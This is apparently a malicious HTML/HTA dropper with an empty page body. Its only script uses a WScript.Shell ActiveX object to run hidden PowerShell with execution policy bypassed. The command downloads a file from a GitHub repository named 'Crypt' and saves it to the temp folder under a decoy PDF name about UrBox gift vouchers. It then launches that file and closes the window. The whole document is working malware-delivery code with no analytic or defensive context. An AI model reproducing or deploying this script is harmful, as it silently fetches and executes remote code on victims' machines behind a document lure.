﻿<html>
<head>
<script>
var objShell = new ActiveXObject("Wscript.Shell");
objShell.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri https://raw.githubusercontent.com/duantienty/Crypt/main/UrBox%20-%20S%E1%BB%AD%20d%E1%BB%A5ng%20Phi%E1%BA%BFu%20Q%C3%B9a%20T%E1%BA%B7ng.pdf -OutFile %temp%\UrBox Overall Introduction - Gửi thông tin chung.pdf;Start-Process %temp%\UrBox Overall Introduction - Gửi thông tin chung.pdf", 0);window.close();
</script>
</head>
<body>
</body>
</html>
